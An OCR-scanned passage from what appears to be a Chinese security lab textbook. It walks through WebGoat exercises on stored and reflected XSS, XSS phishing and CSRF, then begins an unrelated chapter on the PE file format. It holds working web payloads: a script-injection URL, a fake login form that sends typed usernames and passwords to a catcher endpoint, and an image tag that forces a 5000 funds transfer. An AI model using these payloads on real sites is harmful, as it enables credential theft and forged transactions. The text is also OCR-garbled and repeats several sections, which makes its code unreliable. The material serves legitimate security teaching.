过 程 : A 雇员 修改 自己 的 信息 ,在 某 字段 中 存放 具有 攻击 性 的 JavaScript 信息 ,此 信息 
将 存放 到 服务 器 的 数据 库 中 。B 雇员 在 查询 A 雇员 信息 时 ,会 将 A 雇员 此 字段 信息 读 取出 
来 , 即 那 段 具 有 攻击 性 的 JavaScript 信息 ,从 而 达到 攻击 B 雇员 的 效果 。 

G) 实践 步骤 。 

(D 选择 WebGoat 的 XSS LAB:stagel: stored xss, 进 入 实践 界面 ,如 图 13-2 所 示 。 
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图 13-2 存储 型 跨 站 脚本 攻击 


@ 雇员 A 以 用 户 名 Tom、 密 码 tom 登录 。 选 择 Tom, 单 击 ViewProfile 按钮 ,查看 
Tom 的 个 人 信息 ,如 图 13-3 所 示 。 

© 雇员 A 修改 个 人 信息 。 单 击 EditProfile 按钮 ,在 Street 一 栏 中 进行 KSS 攻击 ,如 
13-4 所 示 , 加 入 如 下 代码 : 所 script 二 alert("haha"); 一 /script 二 。 单 击 UpdateProfile， 
退出 登录 。 

@ 雇员 B 以 用 户 名 Jerry Hi jerry 登录 。 选 择 浏览 Tom 的 信息 ,会 弹出 这 段 注入 脚 
本 ,注入 成 功 ,如 图 13-5 所 示 。 

2) 反射 型 XSS 

反射 型 是 最 常用 ,也 是 使 用 得 最 广 的 一 种 攻击 方式 。 它 通过 给 别人 发 送 带 有 恶意 脚本 


性 推荐 使 用 某 些 带 有 “隐私 浏览 ”功能 的 浏览 器 ,例如 Safari。“ 隐 私 浏览 ”功能 可 以 让 
用 户 在 上 网 时 不 会 留 下 任何 痕迹 。 浏 览 器 不 会 存储 Cookie 和 其 他 任何 资料 ,从 而 
CSRF 也 拿 不 到 有 用 的 信息 。 


5. 实践 操作 及 步骤 


搭建 实践 环境 WebGoat 步骤 参见 实践 12 。 

1) 存储 型 XSS 

(1) 实践 目标 : 

执行 存储 型 跨 站 脚本 攻击 。 以 “Tom” 身 份 登录 网 站 ,修改 个 人 信息 。 验 证 用 户 Jerry 
是 否 会 受到 攻击 。 每 个 账户 的 密码 是 用 户 明 名 字 的 小 写 ( 如 : Tom 的 密码 是 tom), 

(2) 实践 角色 及 过 程 。 

攻击 者 : A 雇员 。 受 害 者 : B 雇员 。 

过 程 : A 雇员 修改 自己 的 信息 ,在 某 字段 中 存放 具有 攻击 性 的 JavaScript 信息 ,此 信息 
将 存放 到 服务 器 的 数据 库 中 。B 雇员 在 查询 A 雇员 信息 时 ,会 将 A 雇员 此 字段 信息 读 取出 
来 , 即 那 段 具 有 攻击 性 的 JavaScript 信息 ,从 而 达到 攻击 B 雇员 的 效果 。 

G) 实践 步骤 。 

(D 选择 WebGoat 的 XSS LAB:stagel: stored xss, 进 入 实践 界面 ,如 图 13-2 所 示 。 
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图 13-2 存储 型 跨 站 脚本 攻击 


@ 雇员 A 以 用 户 名 Tom、 密 码 tom 登录 。 选 择 Tom, 单 击 ViewProfile 按钮 ,查看 
Tom 的 个 人 信息 ,如 图 13-3 所 示 。 

© 雇员 A 修改 个 人 信息 。 单 击 EditProfile 按钮 ,在 Street 一 栏 中 进行 KSS 攻击 ,如 
13-4 所 示 , 加 入 如 下 代码 : 所 script 二 alert("haha"); 一 /script 二 。 单 击 UpdateProfile， 
退出 登录 。 

@ 雇员 B 以 用 户 名 Jerry Hi jerry 登录 。 选 择 浏览 Tom 的 信息 ,会 弹出 这 段 注入 脚 
本 ,注入 成 功 ,如 图 13-5 所 示 。 

2) 反射 型 XSS 

反射 型 是 最 常用 ,也 是 使 用 得 最 广 的 一 种 攻击 方式 。 它 通过 给 别人 发 送 带 有 恶意 脚本 


性 推荐 使 用 某 些 带 有 “隐私 浏览 ”功能 的 浏览 器 ,例如 Safari。“ 隐 私 浏览 ”功能 可 以 让 
用 户 在 上 网 时 不 会 留 下 任何 痕迹 。 浏 览 器 不 会 存储 Cookie 和 其 他 任何 资料 ,从 而 
CSRF 也 拿 不 到 有 用 的 信息 。 


5. 实践 操作 及 步骤 


搭建 实践 环境 WebGoat 步骤 参见 实践 12 。 

1) 存储 型 XSS 

(1) 实践 目标 : 

执行 存储 型 跨 站 脚本 攻击 。 以 “Tom” 身 份 登录 网 站 ,修改 个 人 信息 。 验 证 用 户 Jerry 
是 否 会 受到 攻击 。 每 个 账户 的 密码 是 用 户 明 名 字 的 小 写 ( 如 : Tom 的 密码 是 tom), 

(2) 实践 角色 及 过 程 。 

攻击 者 : A 雇员 。 受 害 者 : B 雇员 。 

过 程 : A 雇员 修改 自己 的 信息 ,在 某 字段 中 存放 具有 攻击 性 的 JavaScript 信息 ,此 信息 
将 存放 到 服务 器 的 数据 库 中 。B 雇员 在 查询 A 雇员 信息 时 ,会 将 A 雇员 此 字段 信息 读 取出 
来 , 即 那 段 具 有 攻击 性 的 JavaScript 信息 ,从 而 达到 攻击 B 雇员 的 效果 。 

G) 实践 步骤 。 

(D 选择 WebGoat 的 XSS LAB:stagel: stored xss, 进 入 实践 界面 ,如 图 13-2 所 示 。 
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图 13-2 存储 型 跨 站 脚本 攻击 


@ 雇员 A 以 用 户 名 Tom、 密 码 tom 登录 。 选 择 Tom, 单 击 ViewProfile 按钮 ,查看 
Tom 的 个 人 信息 ,如 图 13-3 所 示 。 

© 雇员 A 修改 个 人 信息 。 单 击 EditProfile 按钮 ,在 Street 一 栏 中 进行 KSS 攻击 ,如 
13-4 所 示 , 加 入 如 下 代码 : 所 script 二 alert("haha"); 一 /script 二 。 单 击 UpdateProfile， 
退出 登录 。 

@ 雇员 B 以 用 户 名 Jerry Hi jerry 登录 。 选 择 浏览 Tom 的 信息 ,会 弹出 这 段 注入 脚 
本 ,注入 成 功 ,如 图 13-5 所 示 。 

2) 反射 型 XSS 

反射 型 是 最 常用 ,也 是 使 用 得 最 广 的 一 种 攻击 方式 。 它 通过 给 别人 发 送 带 有 恶意 脚本 


r 

šh Welcome Back Tom — mm Oi) 
First Name: Tom Last Name: Cat 
Street: 2211 HyperThread City/state: Pew Yoik, 
Phone: 443-599-0762 Start Date: 1011999 
Ssn: 792-14-6364 Salary: 80000 
Credit Card: 5481360857968521 Credit Card Limit: 30000 
Comments: Co-Owner. Manager: 106 

Ç "esa T 
Explanation Dates: 
[ EditProfñie J [Logout ] 


图 13-3 Tom 的 个 人 信息 


Fipt>alertrhahan) :</script] City/State: [New York. NY 
[443-599-0762 | start Date: [1011999 u 
792-14-6364 Salary: 80000 

" Credit 

J: [5481360857968521 Card Linit: 30000 

: [Co-Owner Manager: [Tom Cat [=] 


13-5 XSS 注入 成 功 


代码 参数 的 URL 实现 攻击 , 当 URL 地 址 被 打开 时 ,特有 的 恶意 代码 参数 被 HTML 解析 、 
执行 。 它 的 特点 是 非 持久 化 ,必须 用 户 单 击 带 有 特定 参数 的 链接 才能 引起 。 跨 站 代码 一 般 
存在 于 某 一 个 链接 中 , 当 受 害 者 访问 这 样 的 链接 时 , 跨 站 代码 就 被 执行 ,这 类 跨 站 代码 一 般 
不 会 存储 在 服务 器 上 面 。 


(1) 实践 目标 : 

使 用 雇员 搜索 页 面 漏洞 构造 一 个 包含 反射 型 XSS 攻击 代码 的 URL。 验 证 另 一 位 雇员 
访问 该 URL 会 受 影响 。 

(2) 实践 角色 及 过 程 。 

攻击 者 : A 雇员 。 受 害 者 : B 雇员 。 

过 程 : A 雇员 创建 恶意 URL 链接 , 诱 使 给 B 雇 员 单 击 恶意 链接 ,导致 Web 服务 器 返回 
一 个 页 面 ,页 面 中 包含 恶意 的 JavaScript 脚本 代码 ,会 在 B 雇员 的 浏览 器 执行 ,达到 攻击 
效果 。 

(3) 实践 步骤 。 

(D 选择 WebGoat 的 Stage 5: Reflected XSS, 雇 员 A 以 用 户 名 Larry, 密 码 larry 登录 
后 ,进入 Staff Listing Page 页 面 ,如 图 13-6(a) 所 示 。 单 击 SearchStaff 按钮 后 ,进入 雇员 搜 
索 页 面 ,如 图 13-6(b) 所 示 。 


图 13-6 Reflected XSS 


@ 雇员 A 验证 雇员 搜索 页 面 是 否 存 在 漏洞 。 在 如 图 13-6(b) 所 示 的 Name 编辑 框 中 输 
入 一 段 代码 : 


< script >alert("Dangerous");</script> 


单 击 FindProfile 按钮 ,通过 Fiddler 拦截 请 求 数据 如 图 13-7 所 示 , 最 下 面 一 行为 此 请 
求 POST 方法 提交 的 参数 。 

图 13-7 显示 的 URL 如 下 : 

http://localhost:8080/WebGoat/attack?Screen=20&.menu= 900&.search_name= % 
3Cscript% 3Ealert% 28% 22Dangerous% 22% 29% 3B% 3C% 2Fscript% 3E&action = 
FindProfile 

这 就 是 雇员 A 构造 的 恶意 URL。 其 中 ,%3C HTML 的 URL 编码 , 即 


%3C="<"; %3E= ">"; %28%22="(""; %22%29%3B%3C%2F="");</"; 


参数 请 求 传 到 Web 服务 器 后 ,Web 服务 器 返回 的 搜索 结果 页 面 会 包含 search_name 的 
内 容 即 脚本 代码 “一 script 二 alert("Dangerous"); 一 /script 二 ”. 则 说 明 雇 员 搜 索 页 面 存 在 
XSS 漏洞 。 退 出 登录 。 


Ti cati on/x-www-form-url ooo 
1a/4.0 (compatible; MSIE 7.0; ndows -NET 
8i u=300 


|ACCept-| Encoding: g p detiate 
IAccept-Chars' utf-8;q=0.7,*;q=0.3 
Cookie: JSESSTONTD=17618E4556155CFSEDBEE 4020558879 


图 13-7 Fiddler 显示 请 求 数据 


O 雇员 A 将 恶意 URL 链接 发 给 雇员 B, 雇 员 B 登录 系统 后 ,实践 中 在 浏览 器 地 址 栏 输 
入 这 个 URL, 即 模仿 单 击 了 这 个 链接 , 则 Web 服务 器 返回 雇员 搜索 结果 页 面 ,在 雇员 B 的 
浏览 器 中 执行 恶意 脚本 并 弹出 危险 信息 ,如 图 13-8 所 示 。 


13-8 雇员 搜索 结果 页 面 


正常 情况 下 显示 搜索 用 户 名 和 相关 信息 的 文本 结果 。 

3) XSS 钓鱼 

XSS 钓鱼 ,Phishing with XSS, 是 指 Web 服务 端 对 用 户 输入 没有 进行 安全 性 验证 ,导致 
Web 服务 端 对 非法 HTTP 响应 时 造成 KSS 漏洞 ,使 某 些 正 常 的 官方 页 面 变 成 了 钓鱼 工具 ， 
如 增加 了 内 容 , 对 于 受害 者 来 说 很 难 发 现 该 内 容 是 否 存在 威胁 ,导致 私 隐 信 息 泄密 。 

(1) 实践 目标 。 

通过 脚本 代码 在 浏览 器 中 创建 一 个 表单 Form, 要 求 用 户 填写 用 户 名 和 密码 。 将 数据 
提交 到 指定 恶意 URL 进行 信息 的 收集 。 

(2) 实践 角色 及 过 程 。 

攻击 者 : A。 受 害 者 : B. 

过 程 : A 创建 恶意 URL 链接 , 诱 使 B 单 击 恶 意 链接 ,导致 Web 服务 器 返回 的 响应 页 面 
中 包含 钓鱼 的 用 户 登 录 表单 (正常 情况 下 不 存在 的 表单 )。B 在 信任 Web 服务 器 的 情况 下 
填写 自己 的 用 户 名 、 密 码 , 单 击 “ 登 录 ” 按 钮 后 将 用 户 名 和 密码 发 送 到 指定 的 恶意 URL, 从 而 
获取 B 的 隐私 信息 。 


(3) 实践 步骤 。 
(D 选择 WebGoat 的 Phishing with XSS, 如 图 13-9 所 示 。 


Introduction 
General 
Access Control Flaws 
AJAX Security This lesson is an example of how a website might support a phishing attack 
Authentication Flaws 
Buffer Overflows Below is an example of a standard search feature. 
Code Quality Using XSS and HTML insertion, your goal is to: 
Concurrency 
Cross-Site Scripting (XSS) Insert html to that requests credentials 
Phishing with XSS = Add javascript to actually collect the credentials 
repens = Post the credentials to http://localhost/webgoat/catcher?PROPERTY=yes... 
LAB: Cross Site Scripting 


Stage t: stored xs To pass this lesson, the credentials must be posted to the catcher servlet. 
Sett arsias 
ming input Validation 

3 stored ss 
Bu = 


hihi This facility will search the WebGoat source. 


WebGoat Search 


Fages aetectec s Search: br></form><br><br><HR> 
Stage 6 Beck hefected x55 
Stored X55 Attachs 


Reflected XSS Attacks 
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13-9 存在 XSS 漏洞 的 搜索 页 面 


首先 攻击 者 A 验证 Web 服务 器 的 搜索 页 面 是 否 存在 漏洞 。 在 浏览 器 中 的 “Search: ”的 


编辑 框 输入 表格 的 HTML 代码 如 下 。 


< form> 

<br><br><HR><H3 > This feature requires account login:</H3 >< br >< br > 
Enter Username:< br >< input type > = "text" id= "user" name = "user">< br > 
Enter Password:< br >< input type > = "password" name = "pass">< br > 
</form>< br >< br >< HR> 


单 击 Search 按钮 后 , Web 服务 器 返回 的 搜索 结果 页 面包 含 这 个 表单 ,如 图 13-10(a) 所 


示 , 页 面 中 增加 的 表单 并 不 存储 在 服务 器 中 ,而 只 是 一 次 性 地 由 脚本 生成 的 表单 。 


WebGoat Search 


This facility will search the WebGoat source] 


Search: 


| Search | 


This feature requires account login: 


Results for: This facility will search the WebGoat source. 


Enter Username: 


Enter Password: 


(a) (b) 
13-10 ”包含 表单 的 搜索 结果 页 面 


图 13-10(b) 所 示 为 正常 情况 下 搜索 test 的 结果 网 页 。 图 13-10(a) 说 明 该 Web 服务 器 


存在 XSS 漏洞 。 


实践 教程 


@ 攻击 者 A 创建 恶意 URL。 
首先 编写 login 登录 按钮 的 HTML 脚本 代码 如 下 。 


< input type = "submit" name = "login" value = "login" 

onclick = "var xssImg = new Image(); 

xssImg. src = 'http://localhost: 8080/WebGoat/catcher? PROPERTY = yes&u = ' + this. form. 
user. value + '&p = ' + this. form. pass. value; "> 


其 中 ， 

<input type="submit" name= "login" value="login": 用 于 在 网 页 上 创建 一 个 login 
按钮 ; 

onclick="; 是 按钮 触发 后 的 脚本 代码 : 

var xssImg 一 new Image(); : 是 新 创建 一 个 图 像 Image 类 的 实例 变量 xssImg; 

xssImg. src= 'http://localhost: 8080/WebGoat/catcher? PROPERTY = yes&u= ' 十 
this. form. user. value+ '&.p= '+- this. form. pass. value; ">>; 设置 图 像 变量 xsslmg 的 来 源 
URL, 并 将 当前 表单 中 的 用 户 名 user 的 值 和 密码 pass 的 值 作为 参数 附 在 URL 中 。 按 钮 触 
发 后 ,脚本 读 取 在 表单 上 输入 的 用 户 名 和 密码 信息 ,并 向 http://localhost:8080/WebGoat/ 
catcher 发 送 Img 请 求 ,请求 参 数 附带 用 户 的 敏感 信息 。 

将 表单 和 登录 按钮 的 这 两 段 脚 本 代码 组 合 形成 参数 如 下 。 


< form><br><br><HR><H3>This feature requires account login </H3 >< tr >< br >< br > Enter| 
Username:<br >< input type = "text" id= "user" name = "user">< br > Enter Password:< br >< input 
type = "password" name = "pass">< br >< input type = "submit" name = "login" value = "login" 
onclick = "var xssImg = new Image(); 

xssImg. src = 'http://localhost: 8080/WebGoat/catcher? PROPERTY = yes&u = ' + this. form. user. 
value + '&p = ' + this. form. pass. value; "> 


其 中 ,This feature requires account 是 一 个 欺骗 性 的 消息 ,通知 用 户 使 用 搜索 功能 前 必 
须 登 录 。 将 上 述 参数 脚本 复制 到 图 13-9 中 的 “Search:” 编 辑 框 , 单 击 Search 按钮 并 通过 
Fiddler 拦截 搜索 请 求 数据 ,如 图 13-11 所 示 。 


File Rules Tools View Help GET /book ËI GeoEdge 
G) #+ Replay PT ET Keep: All sessions = Q Any Process 的 Fnd [l Save B O E brome -Rlar Cache 
— 


et =e: 
sera mozi1ja/S.0 (compatible; MSTE 9.0; windows NT 6.3; Trident/s.0) 
SS a sess 0 > 
8 


20 HT 
200 HTTP 
3⁄4 e 
304 rm 
304 me 
304 me 
34 e 
304 me 
304 e 
304 rm 
m e 


图 13-11 Fiddler 拦截 搜索 请 求 


将 图 13-11 中 正常 URL 后 面 加 上 Username 参数 则 可 构成 一 个 完整 的 恶意 连接 如 下 。 


http://localhost: 8080/WebGoat/attack? Screen = 282&menu = 900&Username = % 3Cform % 3E% 
3Cbr % 3E % 3Cbr % 3E % 3CHR % 3E % 3CH3 % 3EThis + feature + requires + account + login% 3C % 
2FH3 % 3E % 3Ctr % 3E % 3Cbr % 3E % 3Cbr % 3EEnter + Username % 3A% 3Cbr % 3E% 3Cinput + type % 
3D % 22text % 22 + id % 3D % 22user % 22 + name $ 3D % 22user % 22 % 3E % 3Cbr % 3EEnter + Password % 
3A % 3Cbr % 3E % 3Cinput + type % 3D % 22password $ 22 + name + % 3D % 22pass % 22 % 3E % 3Cbr % 3E % 
3Cinput + type% 3D% 22submit% 22 + name% 3D% 22login% 22 + value% 3D% 22login% 22 + 
onclick % 3D % 22var + xssImg % 3Dnew + Image % 28 % 29 % 3B + xssImg. src % 3D% 27http % 3A % 2F % 
2Flocalhost % 3A8080 % 2FWebGoat % 2Fcatcher % 3FPROPERTY % 3Dyes % 26u % 3D % 27 % 2Bthis. form. 
user. value $ 2B % 27 % 26p % 3D % 27 % 2Bthis. form. pass. value % 3B $ 22 % 3E&SUBMIT = Search&user 
= &pass = 


其 中 %xx 是 HTML 编码 。 
@ 攻击 者 A 将 恶意 URL 发 给 受害 者 B, 诱 使 给 B 单 击 恶 意 链 接 ,实践 中 (关闭 


Fiddler) 在 浏览 器 地 址 栏 输入 上 述 URL, 即 模仿 单 击 了 这 个 链接 , 则 Web 服务 器 返回 包含 
表单 和 按钮 的 钓鱼 页 面 ,如 图 13-12 所 示 。 


图 13-12 包含 表单 和 按钮 的 钓鱼 页 面 


用 户 B 如 果 在 这 个 页 面 输入 个 人 的 隐私 信息 并 单 击 login 按钮 ,会 触发 Img 请 求 , 它 会 


向 http://localhost:8080/WebGoat/catcher 发 送 用 户 名 和 密码 信息 。 启 动 Fiddler, 设 置 发 
送 请 求 前 拦截 选项 , 单 击 login 按钮 , 则 Fiddler 拦截 的 login 信息 如 图 13-13 所 示 。 


File Edit Rules Tools View Help GET/book E GeoEdge 
图 + Replay X- h Go | Stream {i Decode | Keep: All sessions ~ @ Any Process $$ Find 区 Save 


: mozi11a/5.0 (wi ;_rv:31.0) Gecko/20100101 Fi 
ext/htm1,app1ication/xhtm1+xm1， cation/xml1;q=0.9,*/*; 
anguage: zh-cn,zh;q=0.8,en- qo S,en;q=0.3 
coding: gzip, deflate 
http://localhost: 8080/WebGoat/attack?screen=282&menu=900&Usd 
SESSIONID=F8D8072AA3838EOF2A453238FED48D9E 
ation: Basic Z3V1c3Q6Z3V1c3Q= 
eep-alive 
ontent-Type: application/x-www-form-urlencoded 
ontent-Length: 612 


[|username=s%3cforms3Es3cbrs3Es3Cbr%3E%3CHR%3E%3CH3%3EThis+feature+reqi q 


13-13 Fiddler 拦截 的 login 信息 


实践 教程 


图 13-13 中 ,Username 的 参数 中 携带 用 户 名 和 密码 如 下 所 示 。 


Username = % 3Cform % 3E % 3Cbr % 3E % 3Cbr % 3E % 3CHR % 3E % 3CH3 % 3EThis + feature + requires + 
account + login % 3C% 2FH3 % 3E % 3Ctr % 3E % 3Cbr % 3E % 3Cbr % 3EEnter + Username % 3A % 3Cbr % 
3E % 3Cinput + type % 3D % 22text % 22 + id % 3D % 22user % 22 + name % 3D % 22user % 22 % 3E % 3Cbr % 
3EEnter + Password % 3A % 3Cbr % 3E % 3Cinput + type % 3D % 22password % 22 + name + % 3D% 22pass % 
22 % 3E % 3Cbr % 3E % 3Cinput + type % 3D % 22submit % 22 + name % 3D % 22login % 22 + value % 3D % 
22login %22 + onclick % 3D% 22var + xssImg % 3Dnew + Image% 28% 29% 3B + xssImg. src% 3D% 
27http % 3A % 2F % 2Flocalhost % 3A8080 % 2FWebGoat % 2Fcatcher % 3FPROPERTY % 3Dyes % 26u % 3D % 
27 % 2Bthis. form. user. value % 2B % 27 % 26p % 3D % 27 % 2Bthis. form. pass. value % 3B % 22 % 3E&user 
= admin&pass = admin&login = login 


此 请 求 成 功 发 送 , 则 成 功 从 钓鱼 页 面 获 取 用 户 名 和 密码 。 

4) 跨 站 请 求 伪造 

(1) 实践 目标 : 感性 认识 CSRF 漏洞 。 

(2) 实践 角色 及 过 程 。 

攻击 者 : A。 受 害 者 : B。 

过 程 : A 向 一 个 新 闻 组 发 送 一 封 邮件 ,在 邮件 正文 中 包含 一 张 图 片 ,图 片 会 向 指定 转账 
URL 发 送 请 求 。B 收 到 邮件 之 后 ,其 浏览 器 会 解析 这 个 图 片 ,浏览 器 会 携带 B 登录 信息 的 
Cookie 发 出 转账 请 求 , 由 于 具有 此 Cookie 信息 ,服务 器 则 认为 此 为 合法 请 求 , 完 成 转账 
功能 。 

(3) 实践 步骤 。 

(D 选择 WebGoat 的 Cross Site Request Forgery (CSRF) ,如 图 13-14 所 示 。 


Stage 1 stored Xss 


2: Block stored X55 Title: test 

sing input validation Message: 

Stage 3: stored Xss “hi <img src="http://localhost:8080/WebGoat/attack? 
Revisited Screen=S2&menu=900&transferFunds=5000" width="1" 
Stage 4: Block Stored XSS height="1"/> 


Kross Site For: 


[CSRF Prompt By-Pass 
[CSRF Token By-Pass 
|HTTPOnty Test 


[Cross Site Ti 
— wa Er 
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攻击 者 A 在 图 13-14 中 的 Message 编辑 框 中 输入 以 下 上 脚本。 


< img src = "http://localhost :8080/WebGoat/attack?Screen = 52&menu = 900&transferFunds = 5000" 
width = "1"height = "1" /> 


其 中 ,width 一 "1"height 一 "1" 表 示 图 像 的 像素 长 宽 为 1X1。 单 击 Submit 按钮 提交 数 
据 , 此 数据 将 作为 邮件 链接 存放 到 服务 器 ,图 标 为 se tit, 

© 用 户 B 或 其 他 用 户 已 经 登录 到 某 个 银行 网 站 ,同时 又 进入 到 新 闻 网 站 浏览 这 个 恶意 
邮件 , 则 使 用 指定 的 参数 向 银行 网 站 的 transferFunds. do 页 面 发 送 转账 请 求 。 


单 击 邮件 test 后 ,Fiddler 收 到 的 一 系列 HTTP 连接 。 图 13-15(a) 中 ,序号 1 是 单 击 邮 
件 按钮 的 请 求 邮 件 消 息 , 序 号 11 是 发 送 转账 请 求 的 HTTP 连接 。 图 13-15(b) 显 示 该 请 求 
所 携带 的 参数 。 


File Edit Rules Tools View Help GET/book [RJ GeoEdge 
Œ + Replay X h Go | Stream Hj Decode | Keep: All sessions + @Ë Any Process WÀ Find El Save | ÙÈ © Æ É 


sl 
J333333333337 


“PAU Gr ar uru awan 
=L === Eli EE | 


NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0 
5 


8, 
8, en LBi qs,eniq-0.3 


anguage: ; En =: 


, def at 
oi er JSESSTONID 3 IE 
3Q6z3V1c3Q= 
‘onnection: keep-alive 


Z 


Frd… (press Ctri+Enter to highight a) 
(a) 


J Inspectors = 
WebForms | HexView | Auth | Cookes | Raw JSON | XML 


Headers | Textvew | 

Name Value 
52 

menu 900 

transferFunds 5000 

(b) 
图 13-15 转账 请 求 信息 
6. 思考 题 


跨 站 脚本 攻击 危险 下 的 个 人 防范 机 制 有 哪些 ? 
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PE 文件 格式 


1. 实践 目的 


较 深 入 地 理解 EXE 和 DLL 文件 的 PE 格式 ,理解 可 执行 文件 加 载 
原理 及 线程 注入 的 原理 。 


2. 实践 环境 


(1) ÆA Internet 的 计算 机 一 台 , 安 装 Windows XP 或 Windows 7 
等 操作 系统 。 

(2) 实践 工具 : VS2008 或 更 高 开发 环境 , WinHex, Stud _ PE, 
Dependency Walker,ExplorerSuite,XueTr. exe, 


3. 名 词 解释 


(1) 导入 表 : 用 来 描述 EXE 或 DLL 可 执行 文件 需 加 载 的 模块 及 所 
用 到 的 导入 函数 的 结构 。 

(2) 导出 表 : 用 来 描述 模块 中 的 导出 函数 的 结构 ,如 果 一 个 模块 导出 
了 函数 ,那么 这 个 函数 会 被 记录 在 导出 表 中 ,这 样 通过 GetProcAddress K 
数 就 能 动态 获取 到 函数 的 地 址 。 

(3) 基 址 重 定位 表 : 程序 编译 时 ,每 个 模块 都 有 一 个 优先 加 载 地 址 
ImageBase(0x400000) ,这 个 值 是 连接 器 给 出 的 。 连 接 器 生成 的 指令 中 的 
地 址 是 在 假设 模块 被 加 载 到 ImageBase 前 提 之 下 生成 的 ,那么 一 旦 程序 没 
有 将 模块 加 载 到 ImageBase 时 , 则 程序 中 的 指令 地 址 就 需要 重新 定位 。 

(4) 模块 句柄 : 模块 代表 的 是 一 个 运行 中 的 EXE 文件 或 者 DLL 文 
件 , 用 来 代表 这 个 文件 中 的 所 有 代码 和 资源 ,模块 句柄 指向 的 就 是 EXE 
和 DLL 等 文件 所 在 内 存 的 位 置 。 

(5) 相对 虚拟 地 址 (Relative Virtual Addresses, RVA) ,在 不 知道 基 
地 址 时 ,RVA 被 用 来 描述 一 个 内 存 地 址 。 它 是 需要 加 上 基地 址 才能 获 
得 线性 地 址 的 数值 。 基 地 址 就 是 PE 映像 文件 被 装 入 内 存 的 地 址 ,并 且 
可 能 会 随 着 一 次 又 一 次 的 调用 而 变化 。PE 格式 大 量 地 使 用 所 谓 的 
RVA( 相 对 虚拟 地 址 ) 。 假 如 一 个 可 执行 文件 被 装 人 的 地 址 是 0x400000， 
并 且 从 RVA 0x12475 处 开始 执行 ,那么 有 效 的 执行 开始 处 将 位 于 
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(4) 模块 句柄 : 模块 代表 的 是 一 个 运行 中 的 EXE 文件 或 者 DLL 文 
件 , 用 来 代表 这 个 文件 中 的 所 有 代码 和 资源 ,模块 句柄 指向 的 就 是 EXE 
和 DLL 等 文件 所 在 内 存 的 位 置 。 

(5) 相对 虚拟 地 址 (Relative Virtual Addresses, RVA) ,在 不 知道 基 
地 址 时 ,RVA 被 用 来 描述 一 个 内 存 地 址 。 它 是 需要 加 上 基地 址 才能 获 
得 线性 地 址 的 数值 。 基 地 址 就 是 PE 映像 文件 被 装 入 内 存 的 地 址 ,并 且 
可 能 会 随 着 一 次 又 一 次 的 调用 而 变化 。PE 格式 大 量 地 使 用 所 谓 的 
RVA( 相 对 虚拟 地 址 ) 。 假 如 一 个 可 执行 文件 被 装 人 的 地 址 是 0x400000， 
并 且 从 RVA 0x12475 处 开始 执行 ,那么 有 效 的 执行 开始 处 将 位 于 


0x412475 地 址 处 。 假 如 它 被 装 入 的 地 址 为 0x100000, 那 么 执行 开始 处 就 位 于 0x112475 地 址 处 。 
4. 预备 知识 


1) PE 文件 结构 

PE(Portable Executable, 可 移植 的 可 执行 文件 ) 文 件 格式 是 微软 中 可 执行 二 进 制 文件 
的 格式 ,也 应 用 于 各 种 目标 文件 和 库 文件 中 ,如 图 14-1 所 示 。PE 文件 依次 包括 DOS 头 
(DOS 一 stub)、 文 件 头 (IMAGE_FILE_HEADER)、 可 选 头 (IMAGE_OPTIONAL _ 
HEADER32) ,数据 目录 (data directories)、 多 个 块 表 (IMAGE_SECTION_HEADER ,也 称 
为 节 头 ) ,多 个 块 (Section, 也 称 为 节 ) 等 。 


文件 尾 Code View 调 试 信息 
CO 调试 信息 
COFF 行 号 | 
.reloc 
块 (Section) 
„text 
IMAGE_SECTION_HEADER 
IMAGE_SECTION_HEADER 块 表 
IMAGE_SECTION_HEADER | (Section Table) 


IMAGE_SECTION_HEADER 


IMAGE _OPTIONAL_HEADER32 PE 文件 头 
IMAGE FILE HEADER 
`PE`.0.0 
DOS stub DOS 
文件 头 DOS MZ HEADER 部 首 


图 14-1 PE 文件 结构 图 


2) DOS 根 和 签名 

DOS 根 概念 来 源 于 很 早 的 16 位 Windows 的 可 执行 文件 , 它 的 前 两 个 字 节 必须 为 连续 
的 两 个 字母 “<MZ” 由 头 成 员 e_magic 给 出 ,PE 签名 可 由 头 成 员 e_lfanew 给 出 ( 它 是 从 字 节 
偏 移 地 址 60 处 开始 的 ,有 32 字 节 长 ) ,签名 值 为 0x00004550, 即 字母 "PE/0/0”。DOS 根 的 
结构 体 定义 如 下 。 


typedef struct _IMAGE DOS_HEADER { // DOS. EXE header "MZ" 
WORD e magic; // pos 可 执行 文件 标记 
WORD e_cblp; // Bytes on last page of file 
WORD e_ cp; // Pages in file 
WORD e_crlc; // Relocations 
WORD e_cparhdr; // Size of header in paragraphs 
WORD e minalloc; // Minimum extra paragraphs needed 
WORD e_maxalloc; // Maximum extra paragraphs needed 
WORD e_ss; // Initial (relative) SS value 


WORD e_sp; // Initial SP value 
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WORD e_csum; // Checksum 

WORD e_ ip; // Initial IP value 

WORD e_cs; // Initial (relative) CS value 

WORD e_lfarlc; // File address of relocation table 
WORD e ovno; // Overlay number 

WORD e_res[4]; // Reserved words 

WORD e_oemid; // OEM identifier (for e_oeminfo) 
WORD e_oeminfo; // OEM information; e_oemid specific 
WORD e_res2[10]; // Reserved words 

LONG e_lfanew; // 指 向 PE 文件 头 


} IMAGE_DOS_HEADER, x PIMAGE DOS HEADER; 


其 所 在 空间 为 0x40 个 字 节 ,计算 方法 : 一 个 WORD 占 2 个 字 节 ,一 个 LONG 占 4 个 
字 节 ,总 字 节 数 二 16X2 十 4X2 十 10X2 十 4 二 64 二 0x40( 十 六 进 制 )。 用 WinHex. exe 工具 
打开 DEScipher. dat( 由 sever. exe 重 命 名 而 来 ) 文 件 , 如 图 14-2 所 示 , 前 0x40 个 字 节 为 
IMAGE_DOS_HEADER 结构 体 数 据 , 最 后 4 个 字 节 “00 01 00 00” 是 长 整 型 成 员 e_lfanew 
的 值 ,存储 显示 是 从 左 至 右 表示 低地 址 到 高 地 址 ,而 人 们 习惯 书写 整 型 是 从 左 至 右 表 示 高 位 
到 低位 , 即 0x00000100,e_lfanew 给 出 了 PE 文件 头 的 偏 移 地 址 。 在 文件 地 址 0x00000040 一 
0x000000FF 之 间 的 数据 为 一 些 文本 信息 ,This program cannot be run in DOS mode, 可 以 
用 作 其 他 用 途 ,或 全 部 填 0, 对 PE 文件 无 影响 。 


Offset 0 1 2 3 4 5 6 7 
00000000 |4D SA 90 00 03 00 00 00 
00000010 B8 00 00 00 00 00 00 00 
00000020 |00 00 00 00 00 00 00 00 
00000030 |00 00 00 00 00 OD 00 00 aieia 
00000040 OE 1F BA OE 00 B4 09 CD an ÍI, .LIITh 
00000050 |69 73 20 70 72 6F 67 72 61 6D 20/63 61 6E 6E 6F is program canna 
